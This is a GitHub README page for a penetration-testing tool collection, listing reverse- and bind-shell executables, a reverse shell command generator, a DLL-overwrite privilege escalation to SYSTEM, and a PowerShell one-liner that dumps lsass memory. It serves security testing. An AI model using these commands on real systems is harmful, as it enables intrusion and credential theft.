Skip to content

Some random tools I use for penetration testing

Notifications You must be signed in to change notification settings

vaginessa/Pentest-Tools-1

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

37 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Pentest-Tools

Some random tools I use for penetration testing.

[ALPHA] - Development in progress.
[BETA] - Development completed but not extensively tested.

Exploitation

  • rsg.py - Generate windows/linux reverse shell command lines based on common techniques.
rsg.py [-h] [--raw] [--encode] {windows,linux} lhost lport
  • bindshell32.exe - Windows Win32 bind shell executable.
bindshell32.exe <LPORT>
  • bindshell64.exe - Windows x64 bind shell executable.
bindshell64exe <LPORT>
  • revshell32.exe - Windows Win32 reverse shell executable.
revshell32.exe <LHOST> <LPORT>
  • revshell64.exe - Windows x64 reverse shell executable.
revshell64.exe <LHOST> <LPORT>
  • [BETA] XpsPrinter.exe - Loads the 'PrintConfig.dll' DLL as SYSTEM
1. Overwrite C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\PrintConfig.dll
2. Run XpsPrinter.exe

Post Exploitation

  • [BETA] Invoke-BooMiniDump.ps1 - Dump the memory of a process using MiniDumpWriteDump in Boolang.
PS C:\> . .\Invoke-BooMiniDump.ps1; Invoke-BooMiniDump -ProcName lsass -DumpFile lsass.dmp

Misc

  • [ALPHA] nmap-parser.py - Parses XML files generated by nmap to highlight vulnerabilities and high potential security issues.
map-parser.py [-h] [-o] [--lhost LHOST] [--lport LPORT] xml

About

Some random tools I use for penetration testing

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 89.4%
  • Python 5.3%
  • Shell 4.7%
  • C 0.6%